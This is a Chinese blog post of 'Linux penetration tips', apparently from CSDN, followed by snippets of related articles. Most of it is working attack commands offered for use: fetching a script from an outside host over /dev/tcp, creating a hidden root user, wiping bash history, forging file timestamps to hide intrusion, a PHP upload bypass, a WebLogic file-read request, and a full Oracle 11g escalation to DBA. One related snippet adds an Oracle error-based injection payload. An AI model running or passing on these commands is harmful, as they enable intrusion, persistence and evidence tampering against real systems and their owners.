linux渗透 时间戳,渗透小技巧之linux

最新推荐文章于 2022-08-13 16:21:13 发布
最新推荐文章于 2022-08-13 16:21:13 发布
阅读量310 收藏
点赞数
文章标签: linux渗透 时间戳

1.无wget nc等下载工具时下载文件

exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e "GET /c.pl HTTP/1.0\n" >&5 && cat c.pl

复制代码

2.Linux添加uid为0的用户

useradd -o -u 0 cnbird

复制代码

3.bash去掉history记录

export HISTSIZE=0

export HISTFILE=/dev/null

复制代码

4.SSH反向链接

ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip -p 指定远端服务器SSH端口

复制代码

然后服务器上执行ssh localhost  -p 44即可

5.weblogic本地读取文件漏洞

curl -H "wl_request_type: wl_xml_entity_request" -H "xml-registryname: ../../" -H "xml-entity-path: config.xml" http://server/wl_management_internal2/wl_management

复制代码

6.apache查看虚拟web目录

./httpd -t -D DUMP_VHOSTS

复制代码

7.cvs渗透技巧

CVSROOT/passwd   UNIX SHA1的密码文件

CVSROOT/readers

CVSROOT/writers

CVS/Root

CVS/Entries     更新的文件和目录内容

CVS/Repository

复制代码

8.Cpanel路径泄露

/3rdparty/squirrelmail/functions/plugin.php

复制代码

9.修改上传文件时间戳(掩盖入侵痕迹)

touch -r 老文件时间戳 新文件时间戳

复制代码

10.利用baidu和google搜索目标主机webshell

intitleHPJackal 1t1t

复制代码

11.包总补充

创建临时“隐藏”目录 mkdir /tmp/…

/tmp/…目录在管理员有宿醉的情况下是“隐藏”的,可以临时放点exp啥的

12.利用linux输出绕过gif限制的图片

printf "GIF89a\x01\x00\x01\x00<?php phpinfo();?>" > poc.php

复制代码

13.读取环境变量对于查找信息非常有帮助

/proc/self/environ

复制代码

14.最新的ORACLE 11提升用户权限(只要session权限)

DBMS_JVM_EXP_PERMS 中的IMPORT_JVM_PERMS

复制代码

判断登陆权限

select * from session_privs;

CREATE SESSION

select * from session_roles;

select TYPE_NAME, NAME, ACTION FROM SYS.DBA_JAVA_POLICY WHERE GRANTEE = ‘GREMLIN(用户名)’;

DESC JAVA$POLICY$

DECLARE

POL DBMS_JVM_EXP.TEMP_JAVA_POLICY;

CURSOR C1 IS SELECT ‘GRANT’ USER(), ‘SYS’, ‘java.io.FilePermission’, ‘<>’, ‘execute’, ‘ENABLE’ FROM DUAL;

BEGIN

OPEN C1;

FETCH C1 BULK COLLECT INTO POL;

CLOSE C1;

DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);

END;

/

connect / as sysdba

COL TYPE_NAME FOR A30;

COL NAME FOR A30;

COL_ACTION FOR A10;

SELECT TYPE_NAME, NAME, ACTION FROM SYS.DBA_JAVA_POLICY WHERE GRANTEE = ‘用户’;

connect 普通用户

set serveroutput on

exec dbms_java.set_output(10000);

SELECT DBMS_JAVA.SET_OUTPUT_TO_JAVA(‘ID’, ‘oracle/aurora/rdbms/DbmsJava’, ‘SYS’, ‘writeOutputToFile’, ‘TEXT’, NULL, NULL, NULL, NULL,0,1,1,1,1,0, ‘DECLARE PRAGMA AUTONOMOUS_TRANSACTION;’BEGIN EXECUTE IMMEDIATE ”GRANT DBA TO 用户”; END;’, ‘BEGIN NULL; END;’) FROM DUAL;

EXEC DBMS_CDC_ISUBSCRIBE.INT_PURGE_WINDOWS(‘NO_SUCH_SUBSCRIPTION’, SYSDATE());

set role dba;

select * from session_privs;

EXEC SYS.VULNPROC(‘FOO"||DBMS_JAVA.SET_OUTPUT_TO_SQL("ID","DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE""GRANT DBA TO PUBLIC"";DBMS_OUTPUT.PUT_LINE(:1);END;","TEXT")||"BAR’);

SELECT DBMS_JAVA.RUNJAVA(‘oracle/aurora/util/Test’) FROM DUAL;

SET ROLE DBA;

复制代码

15. webLogic渗透技巧

四. Weblogin Script Tool(WLST)

写入到\\config\\config.xml

1.进行修改:

\wlserver_10.0\server\bin\setWLSenv.sh

复制代码

2.启动WLST

java weblogic.WLST

wls:/offline> connect(‘admin’, ‘admin’, ‘t3://127.0.0.1:7001’)

wls:/bbk/serverConfig> help()

wls:/bbk/serverConfig> edit()

wls:/bbk/serverConfig> cd(‘Servers’)

wls:/bbk/serverConfig/Server-cnbird> cd(‘Log’)

wls:/bbk/serverConfig/Server-cnbird/log> cd(‘Server-cnbird’)

wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird> startEdit()

wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> set(‘FileCount’, ‘4’)

wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> save()

wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> activate() 提交对应Active Change

wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> disconnect()

wls:/offline> exit()

复制代码

3.批处理:

保存以上命令为cnbird.py

connect(‘admin’, ‘admin’, ‘t3://127.0.0.1:7001’)

cd(‘Servers’)

cd(‘Log’)

cd(‘Server-cnbird’)

startEdit()

set(‘FileCount’, ‘4’)

save()

复制代码

然后执行java weblogic.WLST cnbird.py

碎影立画
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
对于输出点是时间戳渗透测试方法(以Oracle数据库为例)
qq_58000413的博客
07-13 235
注意:仅用于技术讨论,切勿用于其他用途,一切后果与本人无关。 解决方法:1.盲注2.尝试报错注入and 1=ctxsys.drithsx.sn(1,(select banner from sys.v_$version where rownum=1))3.尝试去转化类型to_nchar 转化为varchar或varchar2类型用法to_nchar(table_name)and 1=2 union select null,null,to_nchar(table_name),null from user_tab
智能合约漏洞——时间戳操纵
S123456215的博客
05-28 4608
另一种矿工作恶。 合约逻辑如果某人在区块时间戳正好能被10整除的那个区块中第一个向智能合约转10 ether,那么它将获得之前转入合约的所有赌注。 区块是矿工生成的,矿工可以预先知道下一个区块的时间戳是否能被15整除。 ...
php strtotime 2038 时间戳,php中strtotime与mktime的Y2K38漏洞(时间最长为2038年)
weixin_30851637的博客
03-22 439
最近有企业建站系统用户发现一个问题,企业有效期时间修改后保存无效,经仔细检测发现是超过了2038年01月19日的时间就无效了,后来在网上也找到了相关的说法证实。Y2K38 漏洞Y2K38,又称 Unix Millennium Bug,此漏洞将会影响到所有 32 位系统下用 UNIX 时间戳整数来记录时间的 PHP,及其它编程语言。一个整型的变量所能保存的最大时间为 2038 年01月19 日 03...
智能合约安全漏洞之区块链的时间戳依赖漏洞与解决方法
StevenX5
04-15 4795
时间戳依赖是指智能合约的执行依赖于当前区块的时间戳,如果时间戳不同,那么合约的执行结果也有差别。因此,如果在智能合约中不正确地使用区块时间戳,这将是非常危险的。本文通过对时间戳依赖漏洞原理的阐述,并结合 Solidity 智能合约实例代码的演示,介绍了一种区块链时间戳依赖漏洞及其解决方法。
Linux查看History记录加时间戳的小技巧
01-10
Linux查看History记录加时间戳技巧 熟悉bash的都一定知道使用history可以输出你曾经输入过的历史命令,例如 [root@servyou_web ~]# history | more 6 ./test.sh 7 vim test.sh 8 ./test.sh 但是这里只显示了...
linux时间戳转换
05-11
linux时间戳 和本地时间相互转换,不需要连接网络,主要就是提供一个时间转换
Linux时间戳取证研究.pdf
09-06
Ext2文件系统是Linux操作系统中最常用的文件系统之一,Ext3和Ext4是其后继版本。这些文件系统中都有着不同的时间戳机制。 在Linux操作系统中,文件的时间戳可以分为三种类型:访问时间(Access Time)、修改时间...
Linux登录日志时间戳转换工具
08-20
Linux登录日志时间戳转换工具,主要用于Linux系统登录分析,方便溯源。
TCP时间戳
diaopian9359的博客
06-14 505
https://blog.csdn.net/mary19920410/article/details/77255967 转载于:https://www.cnblogs.com/fuluwwa/p/9184247.html
oracle 渗透,渗透oracle11g
weixin_36354131的博客
04-03 524
我曾经在90sec论坛里发过这两篇文章,目测t00ls里关于oracle攻防方面的文档很少,算是科普一下,再次拿出来分享,也给自己攒点积分好能看别人发的帖子 一.漏洞概要漏洞描述:Oracle11g自身权限配置的缺陷,导致只拥有CREATE SESSION权限的用户能够完全控制整个系统。受影响版本:Oracle Database 11.1.0.7.0以及更低版本二.原理分析2.1获取J...
Linux渗透技巧+实战
收集盒 Book box
11-15 1496
一.ldap渗透技巧 1.cat /etc/nsswitch 看看密码登录策略我们可以看到使用了file ldap模式 2.less /etc/ldap.conf base ou=People,dc=unix-center,dc=net 找到ou,dc,dc设置 3.查找管理员信息 匿名方式 ldapsearch -x -D “cn=administrator,cn=Peo
Linux默认开启TCP时间戳导致syn-ack不能返回(不能返回响应数据)
HaleyTiger的博客
08-13 2551
Linux默认开启TCP时间戳导致syn-ack不能返回(不能返回响应数据)
开发API接口的安全验证:token,参数签名,时间戳
何哥的博客
03-18 1万+
前言:服务端与前端对接的API接口,如果被第三方抓包并进行恶意篡改参数,可能会导致数据泄露和篡改数据,下面主要围绕token,签名,时间戳,三个部分来保证API接口的安全性。 参考链接,致敬前辈: 开放API接口签名验证,让你的接口从此不再裸奔 API接口的安全设计验证:ticket,签名,时间戳 1.用户成功登陆站点后,服务器会返回一个token,用户的任何操作都必须带了这个参数,可以将这个参数直接放到header里。 2.客户端用需要发送的参数和token生成一个签名sign,作为参
Java执行SQL代码块,得到dbms_output.put_line的结果
全技术调调
03-22 3218
<br />在Java中执行一段SQL的代码段如下:<br />declare var_user_no varchar2(50); begin select userName into var_user_no from user where user_id='1234'; dbms_output.put_line(var_user_no); end;<br />的时候因为不是存储过程所以没有什么入参和出参<br /> <br />我参考的是http://asktom.oracle.co
ICMP timestamp请求响应漏洞处理(CVE-1999-0524)
热门推荐
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
02-24 3万+
一、漏洞描述 漏洞描述:远程主机响应ICMP时间戳请求。 时间戳回复是回复时间戳消息的ICMP消息。 它由时间戳的发送者发送的始发时间戳以及接收时间戳和发送时间戳组成。 这个信息理论上可以用来开发其他服务中基于时间的弱随机数发生器。 风险级别低。 二、加固处理 1)防火墙上过滤外来(INPUT)的ICMP timestamp(类型13)报文以及外出(OUTPUT)的ICMP timestamp回复报文 即在防火墙上禁用ICMP timestamp-request;或在系统内置防火墙上编辑iptable规则
【Azure 应用服务】Azure Web App的服务(基于Windows 操作系统部署)在被安全漏洞扫描时发现了TCP timestamps漏洞
weixin_48967543的博客
06-12 1002
问题背景爱购物 https://www.cqfenfa.com/ 什么是TCP timestamps(TCP 时间戳)? The remote host implements TCP Timestamps, as defined by RFC1323(https://www.ietf.org/rfc/rfc1323.txt).A side effect of this feature is that the uptime of the remote host can be sometimes be c...
敏感信息泄露总结
goddemon
03-15 1万+
一.源代码泄露 二.服务器导致的泄露 Apache类泄露 样例文件泄露 /examples/servlets/servlet/CookieExample /examples/servlets/servlet/RequestHeadersExample /examples/jsp/snp/snoop.jsp /examples/async/async1 cookie泄露 IIS泄露 典型iis短文件名 https://github.com/lijiejie/IIS_shortname_Scanner To
linux的tcp时间戳,Linux套接字的Linux时间戳
weixin_42132354的博客
05-01 535
我正在一个项目中工作,以便从文件Linux时间戳记中提到的用于TCP套接字的NIC获取接收和传输 时间戳.但所有文档和测试编码都是针对UDP套接字完成的.但我正在获取NIC的传输时间戳,而不是获取接收TCP数据包的时间戳.我的界面支持以下时间戳Time stamping parameters for enp4s0:Capabilities:hardware-transmit (SOF_...
linux命令时间戳
最新发布
10-25
Linux命令时间戳是指从1970年1月1日(UTC/GMT的午夜)开始所经过的秒数,不考虑闰秒。在Linux系统中,可以使用date命令获取当前时间戳,命令为date +%s。同时,也可以使用date命令将时间戳转换为自己想看到的格式,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值